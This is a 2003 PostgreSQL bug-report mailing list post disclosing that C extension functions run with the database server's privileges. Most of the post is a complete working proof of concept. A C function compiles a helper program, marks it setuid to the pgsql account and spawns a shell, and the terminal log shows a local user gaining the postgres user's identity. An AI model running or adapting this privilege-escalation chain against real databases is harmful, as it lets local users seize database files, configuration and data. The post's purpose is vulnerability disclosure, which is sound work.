"Bug" report - Serious (local shell) - Mailing list pgsql-bugs
| From | Diego Linke - GAMK |
|---|---|
| Subject | "Bug" report - Serious (local shell) |
| Date | |
| Msg-id | 20030814150742.6457e853.linke@calnet.com.br Whole thread Raw |
| Responses |
Re: "Bug" report - Serious (local shell)
Re: "Bug" report - Serious (local shell) |
| List | pgsql-bugs |
============================================================================
POSTGRESQL BUG REPORT TEMPLATE
============================================================================
Your name : Diego Linke
Your email address : gamk@gamk.com.br
System Configuration
---------------------
Architecture (example: Intel Pentium) : Intel
Operating System (example: Linux 2.0.26 ELF) : NetBSD 1.6.1_STABLE
PostgreSQL version (example: PostgreSQL-7.3.2): PostgreSQL-7.3.2
Compiler used (example: gcc 2.95.2) : 2.95.3 20010315
Please enter a FULL description of your problem:
------------------------------------------------
The problem is that postgresql when calls a function in external C, calls with user of the postgres.
A bad user will be able to create binary with shell suid for the user of postgres, and to assume the control of
postgres(pg_hba.conf, bases, postmaster, at last everything that the user of postgres can make).
I presume that this problem has in all the versions of postgres. :p
See this example:
(work/ttyp2:/tmp/ja_era)> id
uid=1000(gamk) gid=100(users) groups=100(users),0(wheel),5(operator)
(work/ttyp2:/tmp/ja_era)> id pgsql
uid=1001(pgsql) gid=1000(pgsql) groups=1000(pgsql)
(work/ttyp2:/tmp/ja_era)> cat supg.c
main() {
setuid(1001);
setgid(1000);
system("/bin/sh");
}
(work/ttyp2:/tmp/ja_era)> cat func.c
#include <stdlib.h>
int execute(int x) {
system("gcc -o /tmp/ja_era/supg /tmp/ja_era/supg.c");
system("chmod a+x /tmp/ja_era/supg");
system("chmod u+s /tmp/ja_era/supg");
return(x+1);
}
(work/ttyp2:/tmp/ja_era)> cc -c -fpic func.c
(work/ttyp2:/tmp/ja_era)> cc -o func.so -shared func.o
(work/ttyp2:/tmp/ja_era)> psql teste
Welcome to psql 7.3.2, the PostgreSQL interactive terminal.
Type: \copyright for distribution terms
\h for help with SQL commands
\? for help on internal slash commands
\g or terminate with semicolon to execute query
\q to quit
teste=# CREATE FUNCTION execute (integer) RETURNS integer AS '/tmp/ja_era/func.so' LANGUAGE C;
CREATE FUNCTION
teste=# SELECT execute(5);
execute
---------
6
(1 row)
B
teste=# \q
(work/ttyp2:/tmp/ja_era)> ls -l supg
-rws--x--x 1 pgsql wheel 6029 Aug 14 08:41 supg*
(work/ttyp2:/tmp/ja_era)> ./supg
$ whoami
pgsql
$ id
uid=1000(gamk) euid=1001(pgsql) gid=100(users) groups=100(users),0(wheel),5(operator)
$ touch /tmp/teste
$ ls -l /tmp/teste
-rw-r--r-- 1 pgsql wheel 0 Aug 14 08:42 /tmp/teste
$
--
[ Diego Linke - GAMK ]
System/Network/Security Administrator
E-Mail/Site: gamk@gamk.com.br - http://www.gamk.com.br
Public Key: http://www.gamk.com.br/gamk.asc
Phone Number: (+5541) 9967-3464
pgsql-bugs by date: